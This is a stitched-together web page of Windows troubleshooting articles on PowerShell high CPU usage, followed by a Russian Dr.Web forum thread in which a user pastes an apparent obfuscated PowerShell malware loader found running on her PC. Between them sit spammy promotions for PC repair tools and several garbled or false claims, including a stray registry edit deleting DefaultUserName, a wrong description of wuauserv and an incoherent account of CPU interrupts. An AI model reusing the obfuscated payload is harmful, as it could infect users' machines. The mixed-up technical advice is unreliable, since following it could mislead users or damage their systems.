Download Windows Speedup Tool to fix errors and make PC run faster
PowerShell is one of the most prominent command-line interpreters used by Windows users. It is optimized to work perfectly on Windows computers, however, many users have reported that it is causing High CPU usage. The most common cause of this unusual behavior is an outdated OS, but, we are going to give every possible solution to fix PowerShell causing High CPU usage in Windows 11/10.
Before looking at any of the mentioned fixes, you should check for updates. If the version on your computer is obsolete, download the update from microsoft.com. You should also update PowerShell to its latest version. Do this and see if it fixes the issue for you.
If the issue persists, use the following solutions to fix PowerShell causing High CPU usage in Windows 11/10.
- Troubleshoot in Clean Boot State
- Run SFC and DISM
- Check for Virus and Malware
- Reinstall PowerShell
- Use Cloud Reset
- Repair Windows using Installation Media
Let us talk about them in detail.
1] Troubleshoot in Clean Boot State
The problem can be caused by another application triggering the PowerShell process. So, to know more about it, we need to troubleshoot in Clean Boot State and check which application is giving your CPU a hard time.
2] Run SFC and DISM
The problem can be because of a corrupted file system and to fix it we need to run two commands. Since PowerShell is giving you a hard time, we are going to use Command Prompt. So, launch Command Prompt as an administrator and run the following commands to run SFC and DISM.
- To repair damaged system files
sfc/ scannow
- To restore the System Health
dism /online /cleanup-image /restorehealth
Now, check if the issue is fixed.
3] Check for Virus and Malware
Like any other high CPU usage problem, the one caused by PowerShell can be because of viruses and Malware. You can use any third-party application to scan your computer but we are going to use Windows Defender. So, if you want to use Windows Defender to scan your computer for viruses and malware, try the following procedure.
- Launch Settings by Win + I.
- Click Update & Security > Windows Security > Open Windows Security.
- Click Virus & threat protection > Scan Options > Microsoft Defender Offline Scan > Scan now.
Now, wait for the process to complete and remove all traces of virus and malware from your computer and see if the issue is fixed.
4] Reinstall PowerShell
If you are using PowerShell 7, you can uninstall it and then reinstall it.
5] Use Cloud Reset
Use the Cloud Reset option and see if that helps.
6] Repair Windows using Installation Media
Last but not least, if nothing works, try repairing Windows using Installation Media. This won’t delete any of your personal files and will fix the issue for you.
Hopefully, you will be able to fix the PowerShell issue with these solutions.
Read Next: Fix 100% Disk, High CPU, High Memory usage.
Yusuf is an Engineering graduate from Delhi. He has written over 1000 technical articles and has knowledge of programming languages including Java, and C++, and technologies such as Oracle 12C and MsSQL. Troubleshooting Windows is his favorite past-time.
Windows PowerShell process may cause high CPU usage in Windows 10 if the Windows of your system is outdated. Moreover, different conflicting applications (like NativeDesktopMediaService) may also cause the issue at hand.
The user notices the issue when his PC starts behaving sluggish and upon opening the Task Manager, he notices a high CPU usage by PowerShell (in some cases, multiple PowerShell processes keep appearing and disappearing in the Task Manager).
Before proceeding, check if ending the PowerShell process through the Task Manager solves the problem (if due to a temporary glitch).
Update the Windows of Your System to the Latest Release
You may encounter high CPU usage by the PowerShell if the Windows of your system is outdated (as it may cause the incompatibility between the OS modules). In this case, updating the Windows of your system to the latest release may solve the high CPU usage issue.
- Manually update the PC’s Windows and reboot your PC.
Check for Windows Updates - Upon reboot, check if the issue is resolved.
If the issue persists (or you are using an obsolete version of Windows), then you may download the Update Assistant (currently, Windows 10 October 2020 Update) from the Windows 10 download page. Then use that assistant (make sure you launch it as administrator) to update the system and check if that solves the PowerShell issue.
Clean Boot Your PC and Disable/Uninstall the Problematic Applications
The Windows PowerShell process may cause high CPU usage if an application on your system is triggering the PowerShell process. In this context, clean booting the system and disabling/removing the application (causing the issue) may solve the problem.
- Clean boot your PC (you may also try Autoruns, Process Explorer, or WBEMTEST) and check if the high CPU usage by the Windows PowerShell has disappeared.
Clean Boot the Windows 10 PC - If so, then you may enable the applications/services/processes (do not forget to check the browser’s extensions) disabled during the clean boot process one by one till a problematic one is found.
- Once found, then you may disable or remove the problematic one. Usually, the pre-installed driver update utility by the OEM or NativeDesktopMediaService applications are reported to trigger the PowerShell issue.
Uninstall NativeDesktopMediaService
Perform a Repair Upgrade of the PC’s Windows
If none of the solutions solved the high CPU usage issue so far, then you performing a repair upgrade of the PC’s Windows may solve the problem.
- Launch a web browser and steer to the Windows 10 download page.
- Now scroll down and click on Download Tool Now (under Create Windows 10 Installation Media).
Download Media Creation Tool Now - Then let the download complete and afterward, right-click on the downloaded file.
- Now choose Run as Administrator and Accept the License Terms.
- Then, in the “What Do You Want to Do” window, choose Upgrade This PC Now and click on Next.
- Now let the tool download the OS files and follow the prompts to complete the process but during the process, when asked to, choose the option of Keep Windows Settings, Personal Files, and Apps.
Keep Windows Settings, Personal Files, and Apps - Then click on the Install button and let the upgrade process complete (this may take some time to complete, so, make sure you do not turn off the PC during the process).
- Upon completion of the process, reboot your PC and check if the high CPU usage by PowerShell is back to normal.
Remove Malware
The PowerShell process may cause high CPU usage if malware (crypto miner processes or EternalBlue are reported to cause the issue) is triggering the execution of the PowerShell process. In this context, removing the malware may solve the problem. Before proceeding, make sure your antivirus product and its definitions are updated to the latest built.
- Firstly, download and install a malware removal application (like Malwarebytes).
- Then right-click Windows and open PowerShell (Admin).
Open Windows PowerShell Admin - Now execute the following to stop all other PowerShell processes:
while ($true) {Get-Process PowerShell | Where-Object {$_.ID -notcontains $PID} | Stop-Process -Force} - Then use the Windows Search to find *.ps1 files and delete the files that are not essential (make sure you do not delete an essential system file).
- Now click Windows, type: Task Scheduler, and right-click on it. Then select Run as Administrator.
Run Task Scheduler as Administrator - Then check if any of the running or scheduled task is triggering the issue (you may enable viewing of Hidden Tasks in the View menu of the Task Scheduler). If the issue is caused by Blue Eternal, then you may find the Funs task or (GatherNetworkInfo task) in the Task Scheduler.
Show Hidden Tasks in the Task Scheduler - If so, then remove or disable the problematic tasks.
- Now use the tool (installed at step 1) to remove the malware like Malwarebytes to remove the malware (or contact your antivirus vendor to give a tool to find and remove the malware).
- Then use an online antivirus scanner (like ESET Online Scanner or Kaspersky Virus Removal Tool) to scan for the malware and afterward, check if the PowerShell high CPU usage issue is resolved.
If that is too technical for you, then you may backup the essential data (but make sure to delete the data that is not essential) and reinstall the Windows (after formatting the storage drive). After reinstalling the OS, make sure to scan the data with at least two security products (i.e., antivirus and antimalware). Then you may copy back the data to the system. If that is not easy for you, then you may contact an I.T. security expert.
Kevin Arrows
Kevin Arrows is a highly experienced and knowledgeable technology specialist with over a decade of industry experience. He holds a Microsoft Certified Technology Specialist (MCTS) certification and has a deep passion for staying up-to-date on the latest tech developments. Kevin has written extensively on a wide range of tech-related topics, showcasing his expertise and knowledge in areas such as software development, cybersecurity, and cloud computing. His contributions to the tech field have been widely recognized and respected by his peers, and he is highly regarded for his ability to explain complex technical concepts in a clear and concise manner.
Updated May 2025: Stop error messages and fix your computer problem with this tool. Get it now at this link
- Download and install the software.
- It will scan your computer for problems.
- The tool will then fix the issues that were found.
Microsoft Store is one of the most popular online stores where people buy software. If you want to update Windows 10 or some other programs, you might come across with Error Code 0x0000001F7. This error usually occurs due to corrupted files or registry entries. To fix it, follow the steps mentioned below.
Step 1: Run Command Line Tool’regedit’.
Open Command Prompt window and type regedit to open Registry Editor.
Step 2: Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon.
Step 3: Select the value named DefaultUserName. Right-click on it and select Modify.
Step 4: Remove any existing values under the key.
Step 5: Click OK to save the change.
1. Install Pending Updates.
If you still cannot find the update, it could mean that there is something wrong with your computer. You can check the Windows Update settings to make sure that you have the latest version of Windows installed.
1. Try updating again.
Try installing the update again. This might help resolve the issue.
2. Reset your PC.
Resetting your PC will delete all your files and programs. So, we recommend backing up everything important before doing this.
4. Reinstall Windows.
Reinstalling Windows will overwrite your current installation. Make sure that you backup anything important before proceeding.
2. Clean Boot your PC.
To clean boot your PC, go through the following steps:
1. Open Start Menu.
2. Click Control Panel.
3. In the left pane, select Programs & Features.
4. Right-click on each program listed under “Installed Updates,” and select “Uninstall.”
5. After you uninstall each program, restart your computer.
6. If the error still persists, repeat the process with all remaining programs.
3. Try Using CleanMyPC.
Online cleaners are often better than offline software because you can use them anywhere. They’re also much easier to use. You just download the program, run it, and let it do its thing. There’s no installation process, and there’s usually no setup wizard to guide you through the process either.
Many people don’t realize that online cleaners aren’t always better than traditional software. In fact, many of them are worse. Some programs are designed to make things look clean, but actually slow down your computer even further. Others are designed to help you find files, but end up deleting important ones along the way. Still others make changes without asking you, and some allow malware to spread around your system.
A free tool like CleanMy PC makes maintaining your computer easy. This program scans your hard drive and finds problems such as viruses, spyware, adware, and registry errors. Then it lets you fix them yourself. If you want, you can choose to automatically repair everything, or you can go into each problem individually and decide what needs fixing.
You don’t need to pay anything to try out CleanMyPC. All you need is Internet access. Once you’ve downloaded it, open the program and follow the instructions. Afterward, you’ll see a list of problems found during the scan. Click “Fix Problems,” and the program will start working. When it finishes, you’ll see a summary of the work done.
Updated: May 2025
We highly recommend that you use this tool for your error. Furthermore, this tool detects and removes common computer errors, protects you from loss of files, malware, and hardware failures, and optimizes your device for maximum performance. This software will help you fix your PC problems and prevent others from happening again:
- Step 1 : Install PC Repair & Optimizer Tool (Windows 11, 10, 8, 7, XP, Vista).
- Step 2 : Click Start Scan to find out what issues are causing PC problems.
- Step 3 : Click on Repair All to correct all issues.
4. Perform an In-Place Upgrade.
The most common way to resolve this issue is to perform an in-place upgrade. You’ll want to make sure you’re logged into your computer while following the steps below. If you aren’t, you can use the “Run As Administrator” option in Windows Update to do it.
Step 1: Open up the Start menu and type “windows update”.
Step 2: Click on “Windows Update” under Settings.
Step 3: On the left side of the window, select “Check for Updates”.
Step 4: Wait for the process to complete.
Step 5: Once finished, close out of the program.
Step 6: Restart your PC.
RECOMMENATION: Click here for help with Windows errors.
Frequently Asked Questions
Why does Wuauserv lead to high CPU utilization?
wuauserv is a Windows utility that monitors system performance. If you see high CPU usage, it might mean that the program is causing issues. In some cases, high CPU usage could indicate a security issue, like a virus infection. To fix this problem, you’ll want to make sure that you are running the latest version of the software.
If you still experience high CPU usage, you can try restarting your PC. This will clear out old files and programs and start over.
What Is “System Interrupts”?
CPU utilization is measured in percentage points. This is called “system interrupt usage.” If you look at it graphically, you can see what percentage of the total CPU cycles the computer is spending on different tasks. For example, suppose you open up three applications, each one takes 5% of the processor’s resources. You could say that the computer is working on 10% of its capacity. In reality, though, the operating system will take care of most of those tasks for you. So, even though the computer is running 10%, it might feel like it’s actually consuming only 5%.
The reason why we measure CPU utilization in percentages is because there are some things that the operating system does automatically that don’t count toward the overall number. For instance, the operating system checks for viruses, cleans caches, defragments hard drives, etc., without counting against the CPU utilization. These activities are known as “background processes.”
So, if you think about it, the actual amount of CPU utilization is really just a reflection of the background processes taking place. But, since background processes aren’t counted, the number can go way up. And, if it goes up too high, it can cause problems.
For example, if you run out of memory, the operating system will start swapping files into disk storage. When that happens, the process becomes very slow and unresponsive. Eventually, the OS will stop responding altogether. At that point, the computer will become completely unusable.
If you want to know how many background processes are happening, you can use something called “top,” which is a command-line tool that displays information about the current state of the computer. To do this, type “top” into the terminal window. You’ll see a list of programs that are running along with their respective resource consumption. Here’s an example:
You can see that my computer is using approximately 4% of its processing power. However, I have several background processes running, including antivirus software, indexing, and defragmentation. As long as none of those processes consume more than 2% of the CPU, everything is fine.
But, if one of them starts eating up too much of the CPU, it can cause problems, such as freezing the computer.
Want to resolve high CPU usage caused by Windows Powershell on Windows 10?
If you are a tech pro who does not like putting up with repetitive tasks and manage things via the point-and-click method, PowerShell might be one of the most commonly used utilities on your Windows.
PowerShell is also capable of fixing several Windows issues but with that kind of ‘power’, comes the greater possibility of confusing errors.
Recently, several users reported that the PowerShell process is causing high CPU usage in Windows 10. In some cases, PowerShell keeps appearing and disappearing in the Task Manager. We had a look into the issue and discovered that reasons like pending updates, corruption errors, and application interruptions can cause it.
If you are facing a similar issue, you are in the right place because, in this guide, we will walk you through the relevant troubleshooting steps in detail.
Let’s get right into it!
1. Install Pending Updates.
If your PC has a high CPU usage issue, the first thing you need to do is install the pending updates.
It is common for outdated operating systems to show errors like the one at hand. Since the latest updates are packed with new features and bug fixes, installing them will most likely resolve the issue for you in no time.
However, if updating your operating system and its programs does not resolve the error at hand, then proceed with the next method below.
2. Clean Boot your PC.
It’s also possible that the corrupt local applications on your PC are responsible for causing the high CPU issue. Many users have reported that eliminating the faulty programs fixed their issues, which is why we suggest you give it a shot.
The most effective way to run diagnostic tests to identify the faulty program is to launch your PC in a Clean Boot state. When you launch Windows in Clean Boot state, your operating system runs with the bare minimum of drivers, making it easier to detect the problematic application.
Here is how you can Clean Boot your PC:
- Type System Configuration in the search bar and go to the Services tab.
- Checkmark the Hide all Microsoft services box.
- Now select the first half of the services by clicking on the checkbox against them manually.
- Click on OK and restart your PC.
- Check if doing so resolved the issue. In the event that the error persists, it means that one of the selected services is causing the issue. If you have resolved the issue, move on to the 6th step, but if not, repeat the process with the services you didn’t select in the 3rd step.
- Now repeat the 3rd step again but this time, select half of the previously selected services and click on OK.
- Restart your PC and check if this fixed the problem. If not, keep repeating the process till you identify the one problematic app.
- Once you have identified the faulty application or driver, uninstall it.
This should resolve the issue at hand on your PC.
3. Try Using CleanMyPC.
How often do you thoroughly clean your PC? In case you have not removed corrupt files in a long time, now is the time, as they can do serious damage to your system. Moreover, it is likely that junk files in your PC are causing the high CPU usage issue.
You can get rid of these files and the problems they cause by using a good PC cleaner.
Online cleaners tend to be more effective, as they can scan your computer for errors, and resolve the ones found automatically. We tested some of the best online cleaners and found CleanMyPC to be the best.
The system maintenance tools provided by CleanMyPC allow you to remove all types of junk files and speed up the performance of your computer. Scanning your computer with CleanMyPC is quite straightforward as well. As soon as you run a scan, CleanMyPC will find the problems within minutes and attempt to fix them without requiring much input from you.
Give your PC a performance boost by installing CleanMyPC!
Try CleanMyPC Now!
4. Perform an In-Place Upgrade.
In the event that none of the methods mentioned above have worked for you, it implies that you cannot resolve the issue under consideration using conventional troubleshooting methods.
If this is the case, we suggest that you perform an in-place upgrade, since it will repair all the problems within Windows without affecting any of your files.
Here is what you need to do:
- Download Media Creation Tool.
- After successful installation, open the app and click on Upgrade this PC now.
- Follow the instructions on the screen.
- In the Ready to Install window, select the items you want to keep on your PC after installation.
- Click Next and follow the instructions visible on the screen to start Windows installation.
That’s it.
This should resolve the issue once and for all.
This brings us to the end of our guide on resolving high CPU usage caused by Windows PowerShell on Windows 10. We hope that one of the methods mentioned in this guide did the trick for you. If you have any questions about the troubleshooting steps, please let us know in the comment section below.
If this guide helped you, please share it. 🙂
-
Zainab Falak is a staff writer for Saint and an expert in Microsoft Windows, having authored more than 200 posts. She has a Bachelors in Actuarial Sciences and her passion for computers extends to exploring various aspects, from UI customization to the Windows registry and exploring error codes. Twitter
LinkedIn
View all posts
#1
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 24 Январь 2022 — 23:53
Добрый вечер!
Очень прошу Вашей помощи!
Несколько дней назад начал сильно грузиться процессор, что видно на экране клавиатуры. В состоянии простоя до 50-55 %. Проверила компьютер на вирусы разными утилитами, антивирусами, они что-то удалили. Но, нагрузка на процессор не изменилась. Когда открываешь диспетчер задач, нагрузка сразу падает до 2-10 %. Скачала Process Explorer. Исходя из его данных, компьютер нагружается вот этой программой: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.
powershell.exe -c «9113091004;$CuDrs=’jjemeS)EWpxSCEb.a(ZTyuiEEOr’;$rep_var=’f&(9gc7m 2A*_-Tmy*().aNa.me_ (a»__us79i5n{fg p(S+ygxst_mehm]u;u_9s{iv}ng__ aSa7ys?ntcel_m._8I2O/o;u1gszi_!ng_! )S0_ys44t7ei9m._iR}uokntxri4ms_e.wmI1njttemlr0oc2pS_me_r+hvi_ac(ewis;+_urskyinfeg_ -!Mi,-c_rg.os.koxf]-t.e_W?i6_n3fc2_;]3pu__bxl__ict_ _c_+la,ososp9 B__W-l_.F{h7d}eevleb_gpagote_z ?v_]oiqpdx }_Mkg_u_Odjn(k2)[;k(pu_4bcls=icr} ls+ntarjtji8rc ?6v_o_iid3l _f3yZZ_iOl(q(){drbty+gte8a[y]__NEaoy3w-db=__Fxi97le__._Eqjxi_]sxt(ws([_c6eg=pr_ny_u_,er_bh6fjctw4_tzcc-epktr=)p_?F0ri1l0ke.{vRoelbad_iA]lvrlBnfy7t!}es_w(pcz9epa+rvy86ue=qrah=-ftfmw_tn5ce[_p_r__):-z(4bdjytcwep[wf])mzR8eu,giexsvt]_ryi/.}Ldiocdja/l+[Ma,!c_hvninb8eb.juOp7_e{n?_Sux[bnK_qey)r()@76cetop+r_pSOy2F_T_6WAprRnE[5\Mh_i_c,lroe_s_o[jftns\_ChaTF9i\)T!_IP9_cke_[pr__)).96Ge/_t[Vjmaleju_ecg(c5+e5p!zryruu_e_wrhqdfhtsuwt7jc_e/npr7p,(n1_ul_rl7)v,;in_f}(_eNE(kytw??b=mm=pnasul{hl?)_pre-!t_u0?rnvb;qij8nt_g 1U+3QA)sb_=,_NEk_y6w_5b.7_L_ev_ng=?t/h_z;fy5oir}_(i3ynyt__ w_?wkwcvn=_20o;,2wwglw+n__ !zo=iU7vQAnlb[-_i1;,2wvw{6wnz2+=+t_){zrN1E__ywtoba[f_ww{_w_n_a]^x!=j(zibygit8e!_)c/{e.p!grD)_sl8etao__(_O2zz=(_po?=/e-_?2[K5j8SctxnT]!DI_uY)Opa9](_s_Lu76Ju_Z_X)6AEh3Bk-4}73t2o_G{cB2_sT_r_fXatr9-mi_!rp/kmI_,dk__64zkte8__V]X[3F)p_K_M_kImacjq2g?,D24T6_m_7p)_ttc9vepusr_[_www]iw?n4_pp_+CvM_/74k(]s;_2}Iy2nwtp{Pt5/r0 bdECgbF_d1_=(_bI_n5(tP!utzrh8)05l;?Iz?ntz]P3t8dr _xm6VixkB_r=o(,]In/ot0P__tr7a)0U?mQAl_b_;17NtsmA(l8_locmcsa(=te=zV]i)_rt?=u_a0_lM_zeqmbvora/y_(__(Ivingt/[Pt_[r.)iz(-=v1_)_3,rk+e_f_l E28CaF[ud,__(0I!-nt75P2t_-r)p_0p,_3rejqfi a_mV_0k_B7],0elxn1fs00w.0_,!50xj)4c0_7);]_M_a01rs,zh]aa7l.stC6o__pyos(qNe_Ey7_w?b2_,0_f,zE]/CF_?dp,+!UQ?{Arbk_);?d(}(a_MkktuxO_9n)d1M}a_xrsesh8a_5l.x7Gqe4qtDz,etl_keg7fa+tl1eF+toqrpjFuq}nscloti_goon7,Po[_iun+rte2zri(r3EC+9Fcd_6,tm_y_p__eo__fz(.dMk]jujOmln))g)6){+()lv;]}_p[D4ultl_7Im8[pvo}!rtj_(_c-5epy_rynh_tdqclml_-cegsp1r_7)]4_pwrxcivn_ahtg}e [{s6tg_at6yircb_ euhxjtjyer_7ni }nlo_4n3g4_ Np_tbAbdll_fo7c.2at_oe{V,7ir!_t7u_5al(-Mne/2mo74reyrl(I[mnctd8Pt__r? __lW_=Gmt3_,rd-e_f_+ I1?n_tgaPtr]r? pgCs_9u_j))g,v_I_naytPv!t_rvp m_9k!A5!Ju9_,_r6aef__ rIt0nt]_Pyt9ar y_geEbvxQ6t,lU__Inr]t[3=.2 _mo_E2_QSc{O},8uUI__n_t3_32j+ ]dnbAP_yZ_q_g);84}a »z-rvepvlarce_»./(.i.)}»,o»$_1»c -1re{pl)acde»_ce,pra»,][c_hajr]_(3_4)0 -)rewpl_acpe»_pp5CM,»,?[c_hajr][(367)2);9(lis w$e6nv8:tuem_p c-Dfi|qwh=er,e{_($0_.3Na/me4.L]en_gt_h _-e?q _8)2-a!nd{((6Ge,t-2Ac9l k$_).F[ul{lNzamse)1.Aqccles?s./Fiwle_Sy_st1em-Riygh_ts_ -_eq. »3De-levtef»)_})z|dael+;[.En+vi_rounmuenit]j::1Cu_rr1en=tDlireec8to_ryg=pxwdd;[_BWzlF6]:{:fcZZcO(?);’;’$rep_var -rep’+»+’lace($CuDrs[15]+$CuDrs[17]+$CuDrs[15]+$CuDrs[15]+$CuDrs[6]),(»$»+341/341)’|&($CuDrs[22]+$CuDrs[2]+$CuDrs[10])|&($CuDrs[22]+$CuDrs[2]+$CuDrs[10]);980191427″
Логи сделать не получилось, я мало в этом понимаю, но все просит переименовать CureIt в scanner.exe, но он уже переименован.
Помогите, уже не знаю, что делать. Спасибо.
- Наверх
#2
Dr.Robot
Dr.Robot
- Helpers
- 3 351 Сообщений:
Poster
Отправлено 24 Январь 2022 — 23:53
1. Если Вы подозреваете у себя на компьютере вирусную активность и хотите получить помощь в этом разделе,
Вам необходимо кроме описания проблемы приложить к письму логи работы трёх программ — сканера Dr. Web (или CureIt!, если антивирус Dr. Web не установлен на Вашем ПК), Hijackthis и DrWeb SysInfo. Где найти эти программы и как сделать логи описано в Инструкции. Без логов помочь Вам не сможет даже самый квалифицированный специалист.
2. Если у Вас при включении компьютера появляется окно с требованием перечислить некоторую сумму денег и при этом блокируется доступ к рабочему столу,
— попытайтесь найти коды разблокировки здесь https://www.drweb.com/xperf/unlocker/
— детально опишите как выглядит это окно (цвет, текст, количество кнопок, появляется ли оно до появления окна приветствия Windows или сразу же после включении компьютера);
— дождаться ответа аналитика или хелпера;
3. Если у Вас зашифрованы файлы,
Внимание! Услуга по расшифровке файлов предоставляется только лицензионным пользователям продуктов Dr.Web, у которых на момент заражения была установлена коммерческая лицензия Dr.Web Security Space не ниже версии 9.0, Антивирус Dr.Web для Windows не ниже версии 9.0 или Dr.Web Enterprise Security Suite не ниже версии 6.0. подробнее.
Что НЕ нужно делать:
— лечить и удалять найденные антивирусом вирусы в автоматическом режиме или самостоятельно. Можно переместить всё найденное в карантин, а после спросить специалистов или не предпринимать никаких действий, а просто сообщить название найденных вирусов;
— переустанавливать операционную систему;
— менять расширение у зашифрованных файлов;
— очищать папки с временными файлами, а также историю браузера;
— использовать самостоятельно без консультации с вирусным аналитиком Dr. Web дешифраторы из «Аптечки сисадмина» Dr. Web;
— использовать дешифраторы рекомендуемые в других темах с аналогичной проблемой.
Что необходимо сделать:
— прислать в вирусную лабораторию Dr. Web https://support.drweb.com/new/free_unlocker/?keyno=&for_decode=1 несколько зашифрованных файлов и, если есть, их не зашифрованные копии в категорию Запрос на лечение. Дожидаться ответа на Вашу почту вирусного аналитика и далее следовать его указаниям ведя с ним переписку по почте. На форуме рекомендуется указать номер тикета вирлаба — это номер Вашего запроса, содержащий строку вида [drweb.com #3219200];
4. При возникновении проблем с интернетом, таких как «не открываются сайты», в браузерах появляются картинки с порно или рекламным содержанием там, где раньше ничего подобного не было, появляются надписи типа «Содержание сайта заблокировано» и пр. нестандартные уведомления необходимо выложить дополнительно к логам из п.1 лог команды ipconfig
Для этого проделайте следующее:
- Зайдите в меню Пуск на Рабочем столе, вызовите в нем окно команды Выполнить…
- В появившемся окне наберите cmd и нажмите клавишу <Enter>. Появится черное окно консоли (интерпретатора команд).
- Напишите в этом черном окне команду ipconfig /all>»%userprofile%\ipc.log» и нажмите клавишу <Enter>, затем наберите там же команду explorer.exe /select,»%userprofile%\ipc.log» и нажмите клавишу <Enter>, нужный файл будет показан в Проводнике Windows.
- Приложите этот файл к своему сообщению на форуме.
Чтобы не сделать ошибок в написании команд, можно скопировать эти команды отсюда и последовательно вставлять в черное окно консоли путем выбора пункта Вставить из меню, появляющегося при нажатии правой кнопки мыши в черном окне консоли.
- Наверх
#3
Dmitry_rus
Dmitry_rus
- Helpers
- 3 670 Сообщений:
Guru
Отправлено 25 Январь 2022 — 00:01
Подхватили вы заразу, судя по всему. Сейчас вам кинут программку, с помощью которой вы сможете сформировать отчет. Сообщение от робота уже немного устарело, некоторые ссылки в нем — нерабочие.
- Наверх
#4
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 25 Январь 2022 — 00:13
Я так и подумала, но уж очень стойкая зараза. До этого были милые, мелкие и привычные, которые легко и понятно удалялись, чудо, а не вирусы. А это… сплошная боль. Спасибо! Буду ждать.
- Наверх
#5
Dmitry_rus
Dmitry_rus
- Helpers
- 3 670 Сообщений:
Guru
Отправлено 25 Январь 2022 — 00:41
Попробуйте пока этим. Более специализированные вещи попозже подъедут. )
https://download.geo.drweb.com/pub/drweb/tools/dwsysinfo.exe
- Наверх
#6
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 25 Январь 2022 — 00:56
Этой программой получился такой отчет.
- Наверх
#7
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 25 Январь 2022 — 00:57
Не прикрепилось первый раз.
- Наверх
#8
Ivan Korolev
Ivan Korolev
- Virus Analysts
- 1 430 Сообщений:
Poster
Отправлено 25 Январь 2022 — 07:36
Один детект добавил, соберите расширенный отчет с помощью утилиты: https://drw.sh/xeyuak
- Наверх
#9
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 25 Январь 2022 — 10:08
Спасибо! Вечером приду домой и сразу сделаю.
- Наверх
#10
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 25 Январь 2022 — 20:52
Добрый вечер! Сюда отчет загрузить не смогла. Вот ссылка на диск:
https://disk.yandex.by/d/MqAXM0zOHGIyeg
Посмотрите, пожалуйста, что можно с этим сделать.
- Наверх
#11
Ivan Susloparov
Ivan Susloparov
- Members
- 163 Сообщений:
Member
Отправлено 26 Январь 2022 — 19:21
Для лечения используйте утилиту: https://drw.sh/qqqeoy
- Наверх
#12
LimNiar
LimNiar
- Posters
- 7 Сообщений:
Newbie
Отправлено 26 Январь 2022 — 22:47
Добрый вечер!
Провела лечение предложенной программой (не знаю нужен ли отчет, но вот, на всякий случай: https://disk.yandex.by/d/gzypQuMQJHNIVQ).
В течение часа все хорошо, нагрузка на процессор снизилась до нормальных 2-10 %, Process Explorer ничего лишнего не фиксирует, компьютер стал такой тихий, а я первый раз за неделю нормально засну.
Спасибо Вам всем огромное! Первый раз обратилась за помощью на форум, не ожидала такой оперативной и квалифицированной помощи, если честно, вообще не была уверена, что кто-то поможет.
Вы чудесные люди! Спасибо!
- Наверх